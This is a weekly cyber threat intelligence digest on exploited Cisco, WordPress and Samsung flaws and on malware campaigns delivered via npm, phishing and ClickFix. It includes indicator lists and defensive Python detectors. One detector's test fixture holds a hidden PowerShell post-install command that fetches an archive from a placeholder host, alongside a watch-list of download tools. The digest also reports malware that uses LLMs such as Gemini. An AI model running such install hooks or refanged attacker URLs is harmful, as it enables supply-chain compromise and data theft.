Cyber Threat Intelligence Digest: Week 45

12th November 2025 - Threat Reports
  • Vulnerabilities
  • Potential Threats
  • General News
  • Threat Actor Weekly Graph
  • Global Trends Powered by Recorded Future
  • Prominent Information Security Events
  • Remediation Actions

Executive Summary - Highlights of Cyber Threat Intelligence Digest

Vulnerabilities

Threat Actors Abuse Actively Exploited Cisco Firewall Flaws CVE-2025-20333 and CVE-2025-20362 to Conduct DDoS Attacks - Threat actors are actively exploiting two recently patched Cisco firewall vulnerabilities, CVE-2025-20333 and CVE-2025-20362, to conduct large-scale distributed denial-of-service (DDoS) attacks against unpatched Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) devices. Cisco addressed both flaws on 25 September 2025 and updated its advisories on 5 November after new exploit variants were observed causing affected devices to enter continuous reboot loops, effectively taking networks offline.

Shadowserver reports that over 34,000 ASA and FTD instances remain exposed, and Cisco has confirmed active exploitation, though no specific threat actor has been named. External researchers have noted similarities to the 2024 ArcaneDoor campaign, which also targeted Cisco zero-days in government environments.

CVE-2025-20333 is a buffer overflow in Cisco’s web services that allows remote code execution via improperly validated HTTP(S) input from authenticated VPN users. CVE-2025-20362, a missing authorisation flaw in the VPN web server, enables unauthenticated attackers to access restricted URLs through crafted requests. When chained, these vulnerabilities grant remote attackers full control over affected VPN and WebVPN services.

Threat Actors Exploit WordPress Post SMTP Flaw CVE-2025-11833 for Account Takeover - Threat actors are actively exploiting CVE-2025-11833, a critical flaw in the Post SMTP WordPress plugin (versions 3.6.0 and earlier) that allows the takeover of administrator accounts. Wordfence first reported the campaign on 3 November 2025, noting over 4,500 attack attempts since 1 November.

The vulnerability arises from missing authorisation checks in the plugin’s PostmanEmailLogs class, enabling unauthorised disclosure of email logs containing password reset links. Exploitation allows attackers to reset administrator passwords and gain full control of affected sites.

A patch was released on 29 October 2025 with version 3.6.1, yet Wordfence estimates that around 210,000 WordPress sites remain exposed to active exploitation.

Threat Actors Exploit Samsung Galaxy Flaw CVE-2025-21042 to Deploy LANDFALL Spyware - LANDFALL, a commercial-grade Android spyware family, has been observed exploiting an out-of-bounds write (CVE-2025-21042) in Samsung Galaxy devices running Android 13, 14 and 15 to conduct targeted surveillance. First reported by Palo Alto Networks on 7 November 2025, the campaign has been active since mid-2024 and focused on users in the Middle East. It abused malformed DNG images to deploy a loader and an SELinux manipulator, exfiltrating audio, messages and files and communicating with HTTPS command-and-control servers. Samsung patched CVE-2025-21042 in April 2025; at the time of reporting the actor remains unattributed, though its infrastructure and tradecraft resemble those of Middle East-based private offensive firms.

The infection chain begins with a malformed DNG that exploits libimagecodec.quram.so to unpack an appended ZIP containing the spyware. Exploitation launches two modules: b.so (a loader that fingerprints the device, registers a unique Agent ID and establishes encrypted HTTPS C2 over ephemeral ports) and l.so (which decompresses and alters SELinux to escalate privileges and persist). Post-execution activity includes staged downloads of native modules and DEX files, process injection and LD_PRELOAD abuse, monitoring WhatsApp media directories for additional payloads, anti-analysis checks, data exfiltration and cleanup.

Potential Threats

Threat Cluster MUT-4831 Uses npm Packages Masquerading as SDKs to Deliver Vidar Infostealer - On November 3, 2025, Datadog Security Research identified seventeen malicious npm packages distributing the Vidar infostealer—the first known instance of this malware being delivered through npm. Tracked as MUT-4831, the threat actors used new npm accounts (“aartje” and “saliii229911”) to upload packages impersonating legitimate SDKs, Telegram bot tools, and icon libraries. Once installed, these packages executed malicious post-install scripts in Node.js or PowerShell that fetched an encrypted ZIP from bullethost[.]cloud, extracted it with a hard-coded password, and launched a Go-compiled Vidar variant named bridle.exe. The payload harvested browser credentials, cookies, crypto wallets, and system files before exfiltrating the data to C2 servers using Telegram and Steam accounts linked to rotating domains.

After exfiltration, the malware self-deleted to evade detection. Datadog recorded over 2,000 downloads before npm removed the packages and banned the accounts, underscoring the ongoing risk of supply-chain compromise through open-source ecosystems.

New Phishing Campaign Uses PNG Files to Deploy XWorm - ANY.RUN analysts reported a new phishing campaign (PurchaseOrder_25005092.JS) that installs the XWorm RAT via a JavaScript installer. The installer writes three staged components into C:\Users\PUBLIC (Kile[.]cmd, Vile[.]png and Mands[.]png); the PNG files are not images but Base64-encoded, AES-encrypted payload containers consumed by an in-memory loader. The heavily obfuscated Kile[.]cmd reconstructs and runs a two-stage PowerShell chain: stage one decodes and AES-decrypts Mands[.]png and runs the result via Invoke-Expression, and stage two decodes and decrypts Vile[.]png and loads the resulting .NET assembly directly into memory to deploy XWorm.

The installer also creates a scheduled task for persistence; XWorm provides credential theft, lateral movement, and remote command execution capabilities, making this a compact, multi-stage phishing vector that uses anti-analysis and file masquerading to evade detection.
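A defender-side check for the file masquerading described above, added here as an example and not taken from the ANY.RUN report: it verifies that a file carrying a .png extension actually begins with the PNG signature, and flags non-images whose body is Base64 text decoding to high-entropy bytes, the shape of the AES-encrypted containers described. The sample inputs are constructed, and the 7.0-bit entropy threshold is an assumption.

```python
import base64
import math
import random
import re
from collections import Counter
from pathlib import Path

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"   # signature every genuine PNG begins with
B64_BODY = re.compile(rb"[A-Za-z0-9+/]+={0,2}")

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: AES ciphertext sits near 8.0, text and real image data far lower."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def inspect_png(data: bytes) -> dict:
    """Decide whether bytes carrying a .png extension are an image or a payload container."""
    is_png = data.startswith(PNG_MAGIC)
    compact = re.sub(rb"\s+", b"", data[:8192])        # base64 writers often wrap lines
    looks_b64 = not is_png and len(compact) >= 64 and B64_BODY.fullmatch(compact) is not None
    entropy = 0.0
    if looks_b64:
        compact = compact[: len(compact) - len(compact) % 4]   # drop a partial trailing quad
        try:
            entropy = shannon_entropy(base64.b64decode(compact))
        except ValueError:                               # binascii.Error is a ValueError
            looks_b64 = False
    return {
        "is_png": is_png,
        "masquerading": not is_png,                      # wrong extension, whatever the content
        "base64_wrapped_ciphertext": looks_b64 and entropy > 7.0,   # assumed threshold
        "decoded_entropy": round(entropy, 2),
    }

def scan_directory(root) -> list:
    """(path, verdict) for every *.png under root that is not a genuine PNG."""
    verdicts = ((str(p), inspect_png(p.read_bytes())) for p in Path(root).rglob("*.png"))
    return [(p, v) for p, v in verdicts if v["masquerading"]]

def constructed_samples() -> dict:
    """Constructed inputs for demonstration; none are real campaign artifacts."""
    rng = random.Random(1)
    real_png = PNG_MAGIC + b"\x00\x00\x00\rIHDR" + rng.randbytes(64)
    container = base64.b64encode(rng.randbytes(2048))  # stands in for an AES-encrypted blob
    wrapped = b"\r\n".join(container[i:i + 76] for i in range(0, len(container), 76))
    note = b"Just a text note, saved with the wrong extension.\n" * 4
    return {"real.png": real_png, "Mands.png": wrapped, "note.png": note}
```

Pointing `scan_directory` at a directory such as C:\Users\Public surfaces any .png that is not actually an image; the entropy flag separates encrypted containers from ordinary misnamed files.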

Threat Actors Deploy PureRAT via ClickFix in Booking.com-Themed Phishing Campaign Targeting Global Hospitality Sector - Sekoia has reported a widespread phishing campaign, active between April and October 2025, that used the ClickFix social-engineering lure to deliver the PureRAT remote access trojan to hotel administrator systems. The intrusions compromised booking management accounts (Booking[.]com, Expedia, Airbnb), which were then sold or abused to phish guests.

The infection chain relied on spoofed Booking[.]com emails redirecting victims through a traffic-distribution system to a fake extranet page that coerced administrators into running a “verification” step; that led to malware that established persistence and executed an in-memory RAT used for credential theft and account takeover.

Stolen booking credentials were subsequently used to send seemingly legitimate reservation messages (email/WhatsApp) to guests, tricking them into entering payment details on phishing pages and enabling financial fraud, a profitable supply-chain style model in which account access is monetised or reused to scale scams.

General News

UK carriers to block spoofed phone numbers in fraud crackdown - Britain’s largest mobile carriers, including BT EE, Virgin Media O2, Vodafone Three, Tesco Mobile, TalkTalk and Sky, have signed a new Telecoms Charter with the UK government aimed at eliminating phone number spoofing within a year. Under the agreement, carriers will upgrade their networks to flag when calls originate from abroad and deploy advanced call-tracing technology to help police identify and dismantle scam operations. The initiative also introduces stronger data-sharing between telecom providers and law enforcement, alongside improved support for scam victims, including two-week response targets.

Operators report already blocking billions of scam texts and millions of fraudulent calls monthly through AI-based detection. The government says the move will make the UK “the hardest place in the world for scammers to operate,” addressing the growing threat of call spoofing, which remains one of the most common tools used in phone-based fraud.

Google warns of new AI-powered malware families deployed in the wild - Google’s Threat Intelligence Group (GTIG) has reported a significant development in malware evolution, with adversaries now integrating large language models (LLMs) directly into their malicious code. This new “just-in-time” self-modification technique allows malware to dynamically alter its behaviour mid-execution, creating adaptable and hard-to-detect threats. Google highlighted several examples, including PromptFlux, a VBScript dropper that uses the Gemini LLM to generate obfuscated variants and fetch new code for evasion, and PromptSteal (aka LameHug), a data miner deployed in Ukraine capable of dynamic script generation and on-demand functionality.

While PromptFlux remains in early development and has been cut off from the Gemini API, its design suggests a shift toward metamorphic, AI-driven malware. GTIG also identified other AI-enabled tools such as FruitShell, a PowerShell-based reverse shell; QuietVault, a JavaScript credential stealer targeting GitHub/NPM tokens; and PromptLock, an experimental Lua-based ransomware capable of operating across Windows, macOS, and Linux.

This research underscores how attackers are beginning to weaponise AI models themselves, leveraging their generative capabilities to evade detection and rapidly evolve code.

Cyber insurance claims surge 230% in the UK - UK insurers have reported a sharp increase in cyber-related payouts, with the Association of British Insurers (ABI) confirming that £197 million was paid out in 2024, a 230% rise from the previous year. This surge is driven primarily by ransomware and malware incidents, which accounted for over half of all claims.

This trend highlights the growing financial toll of cyberattacks on UK businesses and suggests that many organisations remain vulnerable despite having coverage. The report reinforces that cyber insurance should complement, not replace, robust security and incident response measures.

Threat Actor Weekly Graph

Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.

Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.

Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.

Both intent and opportunity are scored out of 100 and together determine the group's severity. These updates can be seen below.

Severity scale: Limited, Basic, Moderate, High.

| Threat Actor | Severity (previous → current) | Opportunity (previous → current) | Intent (previous → current) |
| --- | --- | --- | --- |
| Sandworm Team | NEW → High | NEW → 77 | NEW → 25 |
| CL0P Ransomware Group (FancyCat) | High → High | 81 → 82 | 49 → 49 |
| Coinbase_Cartel (new) | NEW → Basic | NEW → 25 | NEW → 30 |
| BlackNevas Ransomware Group | NEW → Basic | NEW → 25 | NEW → 30 |
| KillSecurity Ransomware Group | Basic → Basic | 45 → 30 | 49 → 49 |

Global Trends Powered by Recorded Future

Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.

The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.

- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.


| Attackers | Methods | Vulnerabilities | Targets |
| --- | --- | --- | --- |
| Interlock Ransomware Group | Play Ransomware | CVE-2025-62848 | Microsoft 365 Admin Centre |
| Rey | EVEREST Ransomware | CVE-2025-12917 | Samsung Galaxy |
| Fin11 | Obfuscated Files | CVE-2025-59320 | Hyundai |
| FANCYCAT | Comebacker | CVE-2024-32068 | Mobile OS Systems |
| DieNet | Local System Data | CVE-2025-59287 | Allianz |

Prominent Information Security Events

Threat Actors Deploy PureRAT via ClickFix in Booking.com-Themed Phishing Campaign Targeting Global Hospitality Sector

Source: Insikt Group | Validated Intelligence Event

IOC: IP - 77[.]83[.]207[.]106

IOC: SHA256 Hash - 703355e8e93f30df19f7f7b8800bd623f1aee1f020c43a4a1e11e121c53b5dd1

IOC: URL - update-info1676[.]com

IOC: Domain - hxxps[:]//verifyguest02667[-]booking[.]com/17149438

Between April and October 2025, unidentified threat actors ran a phishing campaign targeting the global hospitality sector. According to a 6 November 2025 report by Sekoia, the actors used the ClickFix social-engineering technique to deliver the PureRAT malware to hotel administrator systems, compromising booking-management accounts such as Booking.com, Expedia and Airbnb. The stolen credentials were reportedly sold on underground forums or used directly to distribute phishing messages to hotel guests.

Sekoia says the infection chain began with malicious emails sent to hotel administrators from compromised corporate accounts impersonating Booking.com. Those emails contained malicious URLs that redirected recipients to a spoofed website using a Traffic Distribution System (TDS) to conceal the actor’s infrastructure. The site hosted JavaScript that checked for iframe loading and reloaded the browser over HTTP, ultimately redirecting to a spoofed Booking.com extranet page. Using the ClickFix reCAPTCHA technique, the page prompted users to copy and execute a PowerShell command presented as a verification step.

Executing that command initiated a download from a /bomla path, which retrieved further PowerShell scripts that collected system information. The scripts also downloaded a ZIP archive containing an executable and three DLLs, extracted it into the AppData directory, and established persistence via Run registry keys and Start-up shortcuts. The executable triggered DLL side-loading to launch a loader that injected PureRAT into AddInProcess32.exe, enabling in-memory execution. Once active, PureRAT allowed the actors to compromise booking accounts, steal credentials and exfiltrate data.
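The indicator lines in this section are defanged (`[.]`, `hxxps[:]//`, `[-]`). The parser below is an added example, not part of the original digest or the Insikt Group feed: it refangs each value and classifies it by shape, so a hash, IP, domain or URL is typed independently of the label it was filed under. The line format `IOC: <label> - <value>` is assumed from this page.

```python
import ipaddress
import re

SHA256 = re.compile(r"[0-9a-f]{64}", re.IGNORECASE)
URL = re.compile(r"https?://\S+", re.IGNORECASE)
DOMAIN = re.compile(r"(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}", re.IGNORECASE)
IOC_LINE = re.compile(r"^IOC:\s*(?P<label>.+?)\s*-\s*(?P<value>\S+)\s*$")   # assumed digest format

def refang(ioc: str) -> str:
    """Undo the common defanging conventions used in threat reports."""
    s = ioc.strip()
    s = re.sub(r"\[(\.|:|-|@|://)\]", r"\1", s)                     # [.] [:] [-] [@] [://]
    s = re.sub(r"\((?:\.|dot)\)|\[dot\]", ".", s, flags=re.IGNORECASE)
    s = re.sub(r"^hxxp(s?)(?=://)", r"http\1", s, flags=re.IGNORECASE)
    return s

def classify(value: str) -> str:
    """Infer the indicator type from its shape rather than from the label it came with."""
    if SHA256.fullmatch(value):
        return "sha256"
    try:
        ipaddress.ip_address(value)
        return "ip"
    except ValueError:
        pass
    if URL.fullmatch(value):
        return "url"
    if DOMAIN.fullmatch(value):
        return "domain"
    return "unknown"

def parse_ioc_lines(lines) -> list:
    """Parse 'IOC: <label> - <defanged value>' lines into typed, refanged records."""
    records = []
    for line in lines:
        m = IOC_LINE.match(line)
        if not m:
            continue                      # narrative lines are skipped, not errors
        value = refang(m.group("value"))
        records.append({"label": m.group("label"), "value": value, "type": classify(value)})
    return records
```

Feeding the four IOC lines above through `parse_ioc_lines` yields one record each, with the inferred type (ip, sha256, domain, url) ready for a blocklist or SIEM lookup regardless of how the line was labelled.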

Threat Cluster MUT-4831 Uses npm Packages Masquerading as SDKs to Deliver Vidar Infostealer

Source: Insikt Group | Validated Intelligence Event

IOC: Hash - aa49d14ddd6c0c24febab8dce52ce3835eb1c9280738978da70b1eae0d718925

IOC: Domain - iu[.]server24x[.]com

On November 3, 2025, Datadog Security Research reported the detection of seventeen malicious npm packages containing downloader malware that installed the Vidar infostealer on Windows systems. Datadog attributed the activity to the threat cluster MUT-4831 and described it as the first known instance of Vidar being distributed through npm. The threat actors used newly created npm accounts named “aartje” and “saliii229911” to publish the malicious packages, which npm later banned and removed from the registry. Datadog recorded more than 2,000 total downloads of the malicious packages before their removal.

MUT-4831 carried out the campaign by uploading npm packages that impersonated legitimate SDKs, Telegram bot helpers, and icon libraries. The threat actors configured these packages to run a malicious post-install script written in Node.js or embedded PowerShell once users installed them. The script downloaded an encrypted ZIP archive from bullethost[.]cloud, extracted its contents using a hard-coded password, and launched an executable named bridle.exe. Datadog’s analysis determined that bridle.exe was a Vidar infostealer variant that appears to have been compiled in Go. Bridle.exe collected browser credentials, cookies, cryptocurrency wallets, and system files, then packaged the stolen data into ZIP archives and sent them to command-and-control (C2) servers located through Telegram and Steam accounts containing frequently updated C2 domains. After exfiltrating the data, bridle.exe deleted itself to conceal activity and hinder detection.
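Both write-ups of MUT-4831 (this section and Potential Threats above) turn on npm post-install scripts. The following added example, which is not Datadog's tooling or code, audits package.json lifecycle hooks for install-time commands that an SDK, bot helper or icon library has no reason to run. The manifests, package names and token watch-list are constructed placeholders.

```python
import json
import re
from pathlib import Path

# Lifecycle hooks npm runs automatically during `npm install`
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Tooling that a library has no reason to invoke at install time.
# Constructed watch-list; tune it to your environment.
RISKY_TOKENS = re.compile(
    r"powershell|pwsh|Invoke-WebRequest|\biwr\b|DownloadString|Expand-Archive|"
    r"\bcurl\b|\bwget\b|certutil|\bcmd(?:\.exe)?\s+/c|node\s+-e\b|\bunzip\b",
    re.IGNORECASE,
)

def audit_package_json(text: str) -> list:
    """Return one finding per lifecycle hook declared in a package.json string."""
    pkg = json.loads(text)
    findings = []
    for hook, command in (pkg.get("scripts") or {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue
        matches = sorted({m.group(0).lower() for m in RISKY_TOKENS.finditer(command)})
        findings.append({"package": pkg.get("name"), "version": pkg.get("version"),
                         "hook": hook, "command": command, "risky": bool(matches), "matches": matches})
    return findings

def audit_tree(root) -> list:
    """Walk a node_modules tree and return only the risky lifecycle scripts."""
    risky = []
    for path in Path(root).rglob("package.json"):
        try:
            risky.extend(f for f in audit_package_json(path.read_text(encoding="utf-8")) if f["risky"])
        except (OSError, ValueError):
            continue           # unreadable or malformed manifests are skipped, not fatal
    return risky

# Constructed manifests with placeholder names, modelled on the post-install pattern; not real packages.
MALICIOUS_MANIFEST = json.dumps({
    "name": "example-sdk-placeholder", "version": "1.0.3",
    "scripts": {"postinstall": "powershell -w hidden -c \"Invoke-WebRequest https://example.invalid/a.zip -OutFile a.zip; Expand-Archive a.zip\""},
})
BENIGN_MANIFEST = json.dumps({
    "name": "example-lib-placeholder", "version": "2.1.0",
    "scripts": {"prepare": "tsc -p tsconfig.json", "test": "jest"},
})
```

Running `npm install --ignore-scripts` (or setting `ignore-scripts=true` in .npmrc) stops these hooks from executing at all, which pairs well with auditing a tree after the fact.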

Remediation Actions

Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:

  • CVE-2025-20333 / CVE-2025-20362: These vulnerabilities can be remediated by upgrading Cisco ASA and FTD devices to the fixed versions released on 25 September 2025 or later, and ensuring all September and November 2025 security advisories are applied.

  • CVE-2025-11833: This vulnerability can be remediated by updating the Post SMTP WordPress plugin to version 3.6.1 or later.

  • CVE-2025-21042: This vulnerability can be remediated by applying Samsung’s April 2025 Android security update for Galaxy devices running Android 13, 14, and 15.

If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.